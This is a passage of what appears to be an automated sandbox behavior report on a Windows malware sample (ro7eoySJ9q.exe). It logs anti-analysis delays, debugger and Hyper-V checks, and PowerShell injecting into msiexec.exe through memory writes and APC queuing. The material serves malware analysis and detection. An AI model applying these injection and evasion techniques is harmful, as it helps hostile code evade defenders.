      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5891Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3780Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 3500Thread sleep time: -190000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: msiexec.exe, 00000008.00000002.3424004008.0000000009A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeAPI call chain: ExitProcess graph end nodegraph_0-3121
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeAPI call chain: ExitProcess graph end nodegraph_0-3127
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0498F520 LdrInitializeThunk,LdrInitializeThunk,2_2_0498F520
      Source: C:\Users\user\Desktop\ro7eoySJ9q.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 40C0000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
